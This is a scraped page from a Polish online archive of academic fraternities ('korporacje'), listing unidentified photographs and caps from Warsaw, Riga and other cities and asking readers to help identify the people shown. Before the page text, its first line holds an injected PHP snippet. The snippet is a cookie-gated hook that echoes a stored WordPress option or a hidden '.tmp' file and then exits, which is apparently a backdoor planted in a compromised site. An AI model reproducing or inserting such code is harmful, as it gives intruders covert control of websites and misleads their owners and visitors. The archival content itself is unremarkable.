if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Identyfikacja fotografii z Warszawy

Od 2009 r. prezentowane są na stronach Archiwum Korporacyjnego fotografie, a szerzej także inne materialne ślady po korporacjach akademickich, które nie zostały dotychczas zidentyfikowane bądź szczegółowo opisane (vide Identyfikacja fotografii). Celem akcji jest uzupełnienie możliwie wielu brakujących informacji.

Wiele nieopisanych bądź nie w pełni opisanych fotografii znajduje się na niemal wszystkich stronach wirtualnego Muzeum Polskich Korporacji Akademickich. Od 2010 r. dodatkowo niektóre z nich oraz wiele innych nieopisanych fotografii prezentowane są w osobnych działach tworzonych zbiorczo dla identyfikacji fotografii korporacyjnych z jednego ośrodka akademickiego (Identyfikacja fotografii z Wilna, Identyfikacja fotografii z Warszawy, Identyfikacja fotografii z Lublina etc). Fotografie i insygnia korporacyjne, w przypadku których nie można określić ośrodka akademickiego, z którego pochodzą, można zobaczyć w zbiorczym zestawieniu - Identyfikacja fotografii.

Zależałoby nam na ustaleniu możliwie wielu istotnych dla opisu fotografii (bądź innych pamiątek) faktów, w szczególności nazwy korporacji ze zdjęcia, osoby/osób na nim przedstawionych, miejsca i czasu wykonania fotografii. Będziemy wdzięczni za wszelkie informacje, sugestie i przypuszczenia odnośnie prezentowanych zdjęć i innych pamiątek korporacyjnych (vide Kontakt).

Czapka korporacyjna z Warszawy (?)

0.1. Dekiel korporacyjny, prawdopodobnie z Warszawy (?).

Czapka jest koloru fioletowego. Dookoła widoczne są trójkolorowe spłowiałe barwy, prawdopodobnie fioletowo-złoto-brązowe (brunatne, ciemnozielone).

Z boku trzy sztychy, w tym dwa biało(srebrno)-złoto-czarne oraz jeden brązowo(brunatno)-srebrno-czerwony.

Sztychy biało(srebrno)-złoto-czarne są identyczne co do barwy, faktury i szerokości jak zachowane bandy lwowskiej Gasconii (liliowo-złoto-czarne). Sztych brązowo(brunatno)-srebrno-czerwony przypomina zachowane barwy warszawskiej Filomatii (ciemnowiśniowo-srebrno-karmazynowe).

Barwy na deklu mogłyby odpowiadać barwom Korporacji Praetoria z Krakowa (fioletowo-złoto-zielone).

Według niepotwierdzonych informacji właścicielem czapki miał być jednak związany z Cieszynem pastor ewangelicki, oficer żołnierz/kapelan w Kampanii Wrześniowej 1939 r., po wojnie ważna postać w życiu Kościoła Ewangelicko-Augsburskiego w Polsce. Imię i nazwisko owego pastora nie zostało ustalone.

Wbrew otrzymanym wcześniej informacjom, a zgodnie z barwami na czapce, na fotografii widoczny jest dekiel Korporacji Praetoria z Krakowa. Identyfikacji dokonano dnia 26 III 2009 r. dzięki pomocy dra Karola Ryglewicza, syna śp. prof. Karola Ryglewicza (K! Praetoria).

 

Czapka studencka (?)

0.2. Czapka studencka (?).

Czapka jest koloru brunatnego (brązowego, ciemnozielonego). Otok jasnozielony, rozdzielony złotym paskiem (ergo jasnozielono-złoto-jasnozielony).

Zachowały się przynajmniej trzy egzemplarze takiej czapki. Poza Archiwum Korporacyjnym jeden z nich znajduje się w Muzeum Uniwersytetu Warszawskiego (zbiór Z.Kuczyńskiego), a drugi niedawno pojawił się na Allegro.

Fakt, że zachowały się aż trzy egzemplarze wydaje się wskazywać, że jest to raczej czapka znaczącej organizacji akademickiej, dość prawdopodobne, że działającej w Warszawie.

Nie ma pewności, że jest to czapka korporacyjna. Wyrażono przypuszczenie, że mogła to być czapka jednej z tzw. konfederacji.

 

Prawdopodobnie korporacja z Warszawy.

0.3. Prawdopodobnie korporacja z Warszawy.

Fotografia przedstawia grupę członków korporacji, prawdopodobnie korporacji warszawskiej. Istotne byłoby określenie nazwy korporacji, jak także daty i miejsca wykonania fotografii oraz tożsamości osób na zdjęciu.

Według Andrzeja Hagmajera fotografia opisana jako “Alatea Wojtka”, 20 XI 2013 r.

Jerzy Dunin-Borkowski, ok. 1930 r.

0.4. Jerzy Dunin-Borkowski (1908-1992) późniejszy “hetman kolekcjonerów polskich”?

Fotografia przedstawia Jerzego Dunin-Borkowskiego. Istotne byłoby wyjaśnienie czy chodzi o Jerzego Dunin-Borkowskiego (1908-1992) z korporacji Arkonia, późniejszego “hetmana kolekcjonerów polskich”, czy też może członka korporacji Sarmatia o takim samym imieniu i nazwisku.

Prawdopodobnie Jerzy Dunin-Borkowski z K! Sarmatia - opinia Krzysztofa A. Tyszka (K! Aquilonia) 16 I 2012 r. Ostateczna identyfikacja Bartłomiej P. Wróblewski na podstawie porównania ze zdjęciami ze strony Muzeum im. Jerzego Dunin-Borkowskiego w Krośniewicach dnia 16 I 2012 r. (www.muzeumkrosniewice.pl). W opinii Grzegorza Bielickiego, pracownika Muzeum im. Jerzego Dunin-Borkowskiego, a wbrew powyższym ustaleniom, na zdjęciu Jerzy Dunin-Borkowski (1908-1992), hetman kolekcjonerów polskich. Identyfikacja dnia 20 I 2012 r.

 

Prezydium ZPKA, Warszawa 1930/31 r.

0.5. Prezydium ZPKA X kadencji, Warszawa 1930/31 r.

Fotografia przedstawia trzech członków Prezydium ZPKA X kadencji w latach 1930-1931, w środku stoi Jerzy Odyniec z K! Sparta. Istotne byłoby określenie tożsamości pozostałych osób na zdjęciu, a także daty wykonania fotografii. Prawdopodobnie pozostałe dwie osoby to: ówczesny sekretarz wewn. Olgierd Podwysocki z K! Aquilonia oraz skarbnik Wacław Frajndt z K! Filomatia Varsoviensis.

Pierwszy z lewej Olgierd Podwysocki. Identyfikacja przez Krzysztofa A. Tyszkę (K! Aquilonia) 16 I 2012 r.

 

0.6. Uczestnicy I Rady Naczelnej ZPKA, Gdańsk 1927 r.

Fotografie prawdopodobnie przedstawiają korporantów warszawskich-uczestników I Rady Naczelnej ZPKA, która odbyła się w Gdańsku w 1927 r. Istotne byłoby określenie tożsamości osób na zdjęciach.

Prawd. korporant z Warszawy, 1927 r.Prawd. korporant z Warszawy II, 1927 r.Prawd. korporant z Warszawy III, 1927 r.Prawd. korporant z Warszawy IV, 1927 r.

Prawd. korporant z Warszawy VI, 1927 r.Prawd. korporant z Warszawy VII, 1927 r.Prawd. korporant z Warszawy VIII, 1927 r.Prawd. korporant z Warszawy IX, 1927 r.

Prawd. dwóch korporantów z Warszawy X-XI, 1927 r.Prawd. trzech korporantów z Warszawy XII-XV, 1927 r.

Warszawska korporacja.

0.6. Warszawska korporacja.

Fotografie przedstawiają jedną z warszawskich korporacji. W lustrze widać fragment denka czapki. Istotne byłoby określenie nazwy korporacji, okoliczności, jak także tożsamości osób na zdjęciu.

 

_________________________________________________________________________________________

Korporant z Rygi, lata 80/90-te XIX wieku.

1.1. Korporant z Rygi w latach 80/90-tych XIX wieku.

Fotografia przedstawia polskiego korporanta z Rygi, prawdopodobnie członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Korporant z Rygi, lata 80/90-te XIX wieku.

1.2. Korporant z Rygi w latach 80/90-tych XIX wieku II.

Fotografia przedstawia polskiego korporanta z Rygi, prawdopodobnie członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Korporant z Rygi, lata 80/90-te XIX wieku.

1.3. Korporant z Rygi w latach 80/90-tych XIX wieku III.

Fotografia przedstawia polskiego korporanta z Rygi, prawdopodobnie członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.4. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku I.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.5. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku II.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.6. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku IV.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.7. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku V.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.8. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku VI.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.9. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku VII.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.10. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku VIII.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.11. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku IX.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.12. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku X.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.13. Polak w Rydze o inicjałach prawdopodobnie “S.K.” (być może korporant) w latach 80/90-tych XIX wieku XI.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Arkoni, 1900 r.

1.13a. Arkoni w końcu XIX wieku.

Fotografia przedstawia grupę Arkonów, kolegów przyjętych do Arkonii w 1900 r. (w semestrze zimowym 1900/01 ?), prawdopodobnie w towarzystwie oldermana Juliana Matłaszyńskiego.

Zgodnie z opisem pod zdjęciem: od lewej stoją: Bronisław Chudzyński, Eryk Węcławowicz, Jan Oskierka, Adam Ronikier, Marian Baehr, siedzą od lewej: na murku Władysław Trzeciak (bądź Władysław Kontowt), Tomasz Andrycz, olderman (?) Julian Matłaszyński, Karol Lipkowski, Julian Przybytko (?), siedzą na podłodze od lewej: Władysław Kontowt (?), Tomasz Jarnuszkiewicz, Jan Pawłowicz.

W powyższym opisie wymieniono 13 osób, a na fotografii widocznych jest jedynie 12 korporantów. Na podstawie innych fotografii można potwierdzić prawidłowość opisu w odniesieniu do Adama Ronikiera i Mariana Baehra. Dość prawdopodobne wydaje się, że dwa najwyższe rzędy opisano prawidłowo, w tym osobę Karola Lipkowskiego. Być może błąd wkradł się do opisu najniższego rzędu, gdzie podano trzy osoby, a na fotografii widoczne są dwie.

Bylibyśmy wdzięczni za potwierdzenie tożsamości pozostałych osób na zdjęciu.

Czterej Arkoni, Ryga 8 IV 1909 r.

1.14. Czterej Arkoni w 1909 r.

Fotografia przedstawia grupę czterech członków ryskiej Arkonii. Istotne byłoby określenie tożsamości osób na zdjęciu.

Arkoni przed menzurą Teofila Siewruka, Ryga 1910 r.

1.15. Arkoni 1910 r.

Fotografia przedstawia grupę członków Arkonii przed menzurą Teofila Siewruka. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także dziennej daty wykonania fotografii.

Arkoni po menzurze Kazimierza Strawińskiego, Ryga 1911 r.

1.16. Arkoni 1911 r.

Fotografia przedstawia grupę członków Arkonii świętujących po menzurze Kazimierza Strawińskiego. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także dziennej daty wykonania fotografii.

Arkoni, Ryga maj 1914 r.

1.17. Arkoni w maju 1914 r.

Fotografia przedstawia grupę członków Arkonii w maju 1914 r. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także dziennej daty wykonania fotografii.

Arkoni, Ryga 1 V 1911 r.

1.18. Arkoni w dorożce 1911 r.

Fotografia przedstawia grupę członków Arkonii w dorożce w 1911 r. Istotne byłoby określenie tożsamości osób na zdjęciu.

Arkoni, Ryga 1 V 1911 r.

1.19. Arkoni na schodach 1911 r.

Fotografia przedstawia grupę członków Arkonii na schodach w 1911 r. Istotne byłoby określenie tożsamości osób na zdjęciu.

Bufet na kwaterze Arkoni, Ryga 1911 r.

1.20. Bufet na kwaterze Arkoni, 1911 r.

Fotografia przedstawia bufet na kwaterze Arkonii w 1911 r. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także dziennej daty wykonania fotografii.

Dwóch studentów, prawd. członków Arkonii, ok. 1911 r.

1.21. Dwóch studentów, prawd. członków Arkonii, ok. 1911 r.

Fotografia przedstawia dwóch studentów, prawd. członków Arkonii. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także dziennej daty wykonania fotografii.

Arkon, ok. 1911 r.

1.22. Arkon, ok. 1911 r.

Fotografia przedstawia Arkona grającego w tenisa. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także miejsca i dziennej daty wykonania fotografii.

Arkon-Laudanin, 1929 r.

1.23. Arkon-Laudanin, 1929 r.

Fotografia przedstawia Arkona, Filistra kowieńskiej Laudy, na komersie Laudy w 1929 r. Istotne byłoby określenie tożsamości osoby na zdjęciu.

Arkon-Laudanin, 1938 r.

1.24. Arkon-Laudanin I, 1938 r.

Fotografia przedstawia Arkona, Filistra kowieńskiej Laudy, na komersie Laudy w 1938 r. Istotne byłoby określenie tożsamości osoby na zdjęciu.

Arkon-Laudanin, 1938 r.

1.25. Arkon-Laudanin II, 1938 r.

Fotografia przedstawia Arkona, Filistra kowieńskiej Laudy, na komersie Laudy w 1938 r. Istotne byłoby określenie tożsamości osoby na zdjęciu.

Coetus Arkonii, Warszawa ok. 1926 r.

1.26. Coetus Arkonii, 1926 r.

Fotografia przedstawia coetus Arkonii ok. 1926 r. (drugi od lewej siedzi Jerzy Mincer). Istotne byłoby określenie tożsamości osób na zdjęciu, a także daty i okoliczności wykonania fotografii.

_________________________________________________________________________________________

Uroczystości 100-lecia Arkonii, Wielka Brytania 1979 r.

1.1. 100-lecie Arkonii w Wielkiej Brytanii.

Fotografia przedstawia grupę członków Arkonii w trakcie obchodów 100-lecia Korporacji w Wielkiej Brytanii. Istotne byłoby określenie tożsamości osób na zdjęciu.

_________________________________________________________________________________________

Weleci, od lewej: NN, stoi Włodzimierz Ślosarski, NN, NN, siedzi Henryk Kłodecki, Ryga ok. 1900 r.

2.1. Weleci w Rydze.

Fotografia przedstawia grupę członków Korporacji Welecja w Rydze. Na fotografii widoczni są m.in. Włodzimierz Ślosarski i Henryk Kłodecki. Istotne byłoby określenie tożsamości pozostałych osób na zdjęciu, jak także roku wykonania fotografii.

Weleci, od lewej: Jerzy Ciszewski, NN, NN, Ryga 1896 r.

2.2. Weleci w Rydze.

Fotografia przedstawia grupę członków Korporacji Welecja w Rydze. Na fotografii widoczny jest Jerzy Ciszewski. Istotne byłoby określenie tożsamości dwóch pozostałych osób na zdjęciu.

Członek Welecji, Ryga 1895 r.

2.2a. Członek Welecji w Rydze w 1895 r.

Fotografia przedstawia członka Korporacji Welecja w Rydze. Istotne byłoby określenie tożsamości osoby na zdjęciu.

Członek Welecji w Rydze, być może Henryk Genello (?).

2.2b. Członek Welecji w Rydze, być może Henryk Genello (?).

Fotografia przedstawia członka Korporacji Welecja w Rydze, być może Henryka Genello (por. Welecja). Istotne byłoby potwierdzenie (określenie) tożsamości osoby na zdjęciu.

(…) Rothert (?), 1915 r.

2.3. Weleci w Moskwie.

Fotografia przedstawia grupę członków Korporacji Welecja w Moskwie. Zgodnie z opisem na odwrocie fotografii, widoczni są na niej: Bohdan Połoński, Witold Jeśman, Jan Łusakowski, a także bez podania imienia “Rothert”. Istotne byłoby potwierdzenie tożsamości osób na zdjęciu oraz ustalenie imienia Rotherta.

Prawdopodobnie Bolesław Rothert (z weleckich Rothertów tylko on studiował w Moskwie). Identyfikacja dnia 17 III 2012 r.

 

NN, prawdopodobnie członek Welecji, lata 20-te (?).

2.4. Członek Welecji.

Fotografia przedstawiająca prawdopodobnie jednego z członków Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu.

NN, członek bądź gość Welecji, czerwiec 1932 r.

2.5. Członek (gość) Welecji.

Fotografia przedstawiająca jednego z członków bądź gościa jednego z komersów Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu.

Weleci przed (po?) procesją Bożego Ciała, dziedziniec UW, Warszawa 19 VI 1924 r.

2.6. Welecja na procesji w Święto Bożego Ciała.

Fotografia przedstawia grupę Weletów, uczestników procesji eucharystycznej w Święto Bożego Ciała w 1924 r. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu.

Weleci, Warszawa 1925 r.

2.7. Weleci.

Fotografia przedstawia grupę członków Korporacji Welecja przed zebraniem w komisji wydawniczej Bratniej Pomocy Studentów PW dnia 2 V 1925 r. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu.

Drugi od lewej stoi z laseczką Mieczysław Nierojewski. Identyfikacja 13 VII 2012 r. dzięki pomocy córki Moniki Nierojewskiej.

Oldermani Welecji, Warszawa 15 XII 1929 r.

2.8. Oldermani Welecji.

Fotografia przedstawia grupę oldermanów Korporacji Welecja. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu.

Prezydium Welecji, od lewej: NN, NN, Adam Cybulski, Jan Kubalski, NN, NN, Warszawa 1928/29 r.

2.9. Prezydium Welecji, ok. 1930 r.

Fotografia przedstawia prawdopodobnie Prezydium Korporacji Welecja w Warszawie. Na fotografii widoczni są Adam Cybulski i Jan Kubalski. Istotne byłoby ustalenie tożsamości pozostałych osób na fotografii, a także roku i miejsca wykonania fotografii.

Weleci na komersie, początek lat 30-tych.

2.10. Weleci na komersie I.

Fotografia przedstawia czterech członków Korporacji Welecja na jednym z komersów w początkach lat 30-tych. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty i miejsca uroczystości.

Od lewej NN, NN, Józef Bujniewicz, Zdzisław Miller.

 

Weleci na komersie, początek lat 30-tych.

2.11. Weleci na komersie II.

Fotografia przedstawia trzech członków Korporacji Welecja na jednym z komersów w początkach lat 30-tych. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty i miejsca uroczystości.

Od lewej Zdzisław Miller, NN, NN.

 

Weleci na komersie, początek lat 30-tych.

2.12. Weleci na komersie III.

Fotografia przedstawia trzech członków Korporacji Welecja na jednym z komersów w początkach lat 30-tych. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty i miejsca uroczystości.

Weleta, komers początek lat 30-tych.

2.13. Weleta na komersie.

Fotografia przedstawia członka Korporacji Welecja na jednym z komersów w początkach lat 30-tych. Istotne byłoby ustalenie tożsamości osoby widocznej na zdjęciu, a także daty wykonania uroczystości.

Ziemowit Jasiński.

Filistrzy Welecji, komers początek lat 30-tych.

2.14. Filistrzy Welecji na komersie IV.

Fotografia przedstawia członków Filistrów Korporacji Welecja na jednym z komersów w początkach lat 30-tych. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty i miejsca uroczystości.

Od lewej NN, Kazimierz Kiersnowski, NN, NN.

Weleci, komers początek lat 30-tych..

2.15. Weleci na komersie V.

Fotografia przedstawia grupę członków Korporacji Welecja na jednym z komersów w początkach lat 30-tych. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty wykonania fotografii.

Prezydium Welecji, komers początek lat 30-tych.

2.16. Prezydium Welecji w początkach lat 30-tych.

Fotografia przedstawia jedno z Prezydiów Welecji z początków lat 30-tych. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty wykonania fotografii.

Weleci z butelką, komers początek lat 30-tych.

2.17. Weleci na komersie V.

Fotografia przedstawia grupę członków Korporacji Welecja na jednym z komersów w początkach lat 30-tych. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty wykonania fotografii.

Od lewej NN, NN, Ziemowit Jasiński.

Poczet sztandarowy Welecji.

2.18. Poczet sztandarowy Welecji.

Fotografia przedstawia grupę członków Korporacji Welecja. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty i okoliczności wykonania fotografii.

Weleci ze sztandarem, Warszawa.

2.19. Welecja ze sztandarem.

Fotografia przedstawia członków Korporacji Welecja wraz z pocztem sztandarowym Korporacji. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także miejsca i daty wykonania fotografii.

Od lewej NN, Mieczysław Nierojewski (z wąsem i z rękami w kieszeniach), uroczystości ku czci Nieznanego Żołnierza, Warszawa 2 XI 1925 r. Identyfikacja 7 VII 2012 r. oraz uzupełnienie 6 X 2012 r. dzięki pomocy córki Moniki Nierojewskiej.

Prezydium Welecji, Warszawa 1929 r.

2.20. Prezydium Welecji w 1929 r.

Fotografia przedstawia Prezydium Korporacji Welecja w 1929 r. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także miejsca i daty wykonania fotografii.

Od lewej NN, NN, NN, Kazimierz Kiersnowski, Franciszek Sawicki, NN, NN, NN.

_________________________________________________________________________________________

Członek Korporacji Znicz (Lechicja), Dorpat 1904 r.

3.1. Członek Korporacji Znicz (Lechicja) w Dorpacie.

Fotografia przedstawia członka Korporacji Znicz (Lechicji) z Dorpatu w 1904 r. Istotne byłoby określenie tożsamości osoby na zdjęciu, a także dokładnej daty wykonania fotografii.

Stanisław Szydłowski. Identyfikacja przez Marię Głowniak 11 XI 2012 r.

 

_________________________________________________________________________________________

Jagiellonia, Wiedeń ok. 1911 r.

5.1. Jagiellonia w Wiedniu.

Fotografia przedstawia grupę członków Jagiellonii w Wiedniu ok. 1911 r. Istotne byłoby określenie tożsamości osób na zdjęciu, a także dokładnej daty wykonania fotografii.

Jagielloni z Panną, Warszawa 1934 r.

5.2. Jagielloni z Panną, 1934 r.

Fotografia balowa z 1934 r. Istotne byłoby określenie tożsamości osób na zdjęciu, a także dokładnej daty wykonania fotografii.

_________________________________________________________________________________________

Prezydium Patrii, Warszawa.

8.1. Prezydium Korporacji Patria.

Fotografia przedstawia Prezydium Korporacji Patria. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także daty wykonania fotografii.

Stoi Antoni Święcki, prawd. 1938 r., identyfikacja dnia 17 I 2011 r. dzięki pomocy Anny Stankiewicz.

Siedzi w środku z rapirem Jerzy Hagmajer, identyfikacja dnia 18 XI 2013 r. dzięki pomocy Andrzeja Hagmajera.

Coetus Patrii, Warszawa.

8.2. Coetus Korporacji Patria.

Fotografia przedstawia coetus Korporacji Patria. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także daty wykonania fotografii.

Siedzi pierwszy od lewej Jerzy Hagmajer, stoi pierwszy od prawej Janusz Schmidt, identyfikacja dnia 6 I 2013 r. przez Jacka Fedorowicza.

Siedzi pierwszy od prawej prawd. Piotr Myszkorowski, identyfikacja dnia 21 XI 2013 r. przez Andrzeja Hagmajera.

Grupa członków Patrii, lata 20-te.

8.3. Patria, lata 20-te.

Fotografia przedstawia grupę członków Korporacji Patria w latach 20-tych. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także daty i okoliczności wykonania fotografii.

Spotkanie Patrytów w latach 80-tych w Warszawie.

8.4. Spotkanie Patrytów w latach 80-tych w Warszawie.

Fotografia przedstawia grupę członków Patria na spotkaniu w latach 80-tych, siedzą od lewej: Adam Konrad (?) Wędrychowski, Tadeusz Kołaczkowski, Zbigniew Tołłoczko, NN, Janusz Fedorowicz, Jan Pruszkowski, stoją od lewej: Jerzy Hagmajer (?), NN, NN, NN, NN, NN. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także daty i okoliczności wykonania fotografii.

Czwarty od lewej siedzi Antoni Święcki, identyfikacja dnia 17 I 2011 r. dzięki pomocy Anny Stankiewicz.

Prawd. 64. rocznica powstania Patrii, Warszawa 1985 r., identyfikacja dnia 27 XI 2011 r. na podstawie innej fotografii z tej uroczystości.

Korekta opisu, siedzący piąty od lewej to nie Janusz Fedorowicz, identyfikacja dnia 6 I 2013 r. przez Jacka Fedorowicza.

Korekta opisu, piąty od lewej siedzi Jerzy Tymiński, pierwszy od prawej stoi Jerzy Hagmajer, identyfikacja dnia 20 XI 2013 r. przez Andrzeja Hagmajera.

Spotkanie Patrytów w latach 80-tych w Warszawie II.

8.5. Spotkanie Patrytów w latach 80-tych w Warszawie II.

Fotografia przedstawia grupę członków Patria na spotkaniu w latach 80-tych, od lewej stoją: NN, Włodzimierz Głogowski (?), NN, NN, Janusz Fedorowicz (?), NN, Zbigniew Tołłoczko, Jan Pruszkowski. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także daty i okoliczności wykonania fotografii.

Szósty od lewej Antoni Święcki, identyfikacja dnia 17 I 2011 r. dzięki pomocy Anny Stankiewicz.

Po Mszy Św., 63. rocznica powstania Patrii, Warszawa 29 IV 1984 r., identyfikacja dnia 27 XI 2011 r. na podstawie innej fotografii z tej uroczystości z albumu Włodzimierza Głogowskiego.

Korekta opisu, stoi czwarty (a nie piąty!) od lewej Janusz Fedorowicz, identyfikacja dnia 6 I 2013 r. przez Jacka Fedorowicza.

Korekta opisu, stoi piąty od lewej Jerzy Tymiński, identyfikacja dnia 6 I 2013 r. przez Andrzeja Hagmajera.

_________________________________________________________________________________________

Korporacja Sparta, Warszawa druga poł lat. 20-tych.

9.1. Korporacja Sparta

Fotografia przedstawia grupę członków Korporacji Sparta w drugiej połowie lat 20-tych. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także daty i okoliczności wykonania fotografii.

Komers Sparty, Warszawa 1943 r.

9.2. Komers Sparty w 1943 r.

Fotografia przedstawia grupę członków Korporacji Sparta w czasie okupacyjnego komerszu na Rakowieckiej w 1943 r. Istotne byłoby określenie tożsamości osób na zdjęciu oraz dziennej daty wykonania fotografii.

Drugi od lewej siedzi Eugeniusz Konopacki. Identyfikacja Marian Miszczuk dnia 19 II 2013 r.

_________________________________________________________________________________________

Komers (?) Varsovii, Warszawa koniec lat. 30-tych (?).

10.1. Komers (?) Varsovii w końcu lat. 30-tych (?).

Fotografia przedstawia członków Varsovii i jednego członka poznańskiej Silesii (?) w czasie komersu (?) Varsovii w końcu lat 30-tych (?). Istotne byłoby określenie tożsamości osób na zdjęciu, jak także daty i okoliczności wykonania fotografii.

Komers (?) Varsovii, Warszawa koniec lat. 30-tych (?) II.

10.2. Komers (?) Varsovii w końcu lat. 30-tych (?) II.

Fotografia przedstawia nadanie barw jednemu z członków Varsovii prawdopodobnie w czasie komersu Varsovii w końcu lat 30-tych (?). Istotne byłoby określenie tożsamości osób na zdjęciu, jak także daty i okoliczności wykonania fotografii.

_________________________________________________________________________________________

Prezydium Filomatii Varsoviensis z fuksami, siedzą od lewej: Stefan Białobrzeski, NN, Janusz Białobrzeski, NN, NN, Zbigniew Karwowski, NN, NN, Warszawa ok. 1928 r.

10.1. Prezydium Filomatii Varsoviensis z fuksami.

Fotografia przedstawia członków prawdopodobnie prezydium i fuksów Filomatii Varsoviensis w siedzibie korporacji. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty wykonania fotografii.

Poczet sztandarowy Filomatii Varsoviensis, Warszawa.

10.2. Poczet sztandarowy Filomatii Varsoviensis.

Fotografia przedstawia poczet sztandarowy Filomatii Varsoviensis w czasie pochodu. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty i okoliczności wykonania fotografii.

Poczet sztandarowy Filomatii Varsoviensis z księdzem, Warszawa.

10.3. Poczet sztandarowy Filomatii Varsoviensis z księdzem.

Fotografia przedstawia poczet sztandarowy Filomatii Varsoviensis z księdzem. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty i okoliczności wykonania fotografii.

Prawdopodobnie ks. Michał Dmowski, Filister honorowy Filomatii Varsoviensis, fotografia wykonana prawdopodobnie przed murem cmentarza bródnowskiego. Identyfikacja Krzysztof Adam Tyszka (K! Aquilonia) dnia 2 II 2012 r.

Filomaci w aucie, Warszawa.

10.4. Filomaci w aucie.

Fotografia przedstawia członków Filomatii w już wtedy zabytkowym aucie. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty i miejsca wykonania fotografii.

Filomaci na łące, koniec lat 20-tych.

10.5. Filomaci na łące.

Fotografia przedstawia członków Filomatii na łące. Istotne byłoby ustalenie tożsamości osób widocznych na zdjęciu, a także daty i okoliczności wykonania fotografii.

Prezydium Filomatii Varsoviensis, Warszawa ok. 1930 r.

10.6. Prezydium Filomatii.

Fotografia przedstawia Prezydium Filomatii Varsoviensis, pierwszy od lewej Stefan Białobrzeski. Istotne byłoby ustalenie tożsamości pozostałych osób widocznych na zdjęciu, a także daty i okoliczności wykonania fotografii.

Prezydium ZPKA ok. 1930 r., od lewej Stefan Białobrzeski, prezes Mieczysław Pączkowski, NN, Jerzy Hopfer. Identyfikacja przez Krzysztofa A. Tyszkę (K! Aquilonia) 16 I 2012 r.

 

_________________________________________________________________________________________

15.1. Korporacja Grunwaldja (?), Warszawa.

